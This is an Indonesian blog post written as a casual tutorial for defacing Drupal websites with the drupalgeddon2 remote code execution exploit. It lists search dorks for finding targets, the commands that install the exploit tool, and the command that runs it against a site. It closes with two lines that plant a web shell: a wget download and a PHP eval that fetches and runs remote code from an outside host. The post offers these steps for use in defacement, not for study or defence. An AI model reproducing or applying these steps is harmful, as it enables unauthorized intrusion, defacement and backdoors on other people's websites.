Breaking

Kamis, 19 September 2019

Drupal Remote code execution with drupalgeddon











Kon'nichiwa !!!! Gw admin baru disini >///< ....gw mau buat tutorial deface yakan , karna ra deface ra keren . Yaitu deface Drupal remote code execution with drupalgeddon2 sing paling UWU.

Ya udah langsung aja ga usah banyak bacot . Langsung aja .

Bahan :
 - dork
- tools drupalgeddon2 yakan 
- wajah ganteng ๐Ÿ˜Ž๐Ÿ‘Š 

Dork : 
- intext:Drupal AND inurl:user
- inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied"
( kembangin lah pake otak hentai kalian )

Oke next install drupalgeddon2 nya yakan๐Ÿ˜Ž๐Ÿ‘Š

Install drupalgeddon2 : 
- pkg install git
- pkg install ruby
- git clone
github.com/dreadlocked/Drupalgeddon2
- gem install highline

Oke kalo udah langsung lanjut ekse target nya๐Ÿ˜Ž๐Ÿ‘Š
Pertama buka dulu tools drupalgeddon2.
 -  cd drupalgeddon2

kalo udah siapkan target dulu bambang๐Ÿ˜Ž๐Ÿ‘Š lo mau nghek apa kalo ga ada targetLanjut bambang disini aing dah ada target Langsung gas aja bro cara nya :

$ ruby drupalgeddon2.rb http://target.com 


Kalo vuln tampilan nya kaya gitu... Setelah ini terserah lo mau di apakan tuh web.

Cara manggil shell:3
- wget linkshell.com/Shell.txt -O Shell.php
- echo '<?php eval("?>".file_get_contents("linkshell.com/Shell.txt"));?>' > shell.php

Sekian dari gw, sorry kurang jelas pertama kali gw ng- blog , stay strong๐Ÿ˜Ž๐Ÿ‘Š ailopyu all๐Ÿ˜€❤



Tidak ada komentar:

Posting Komentar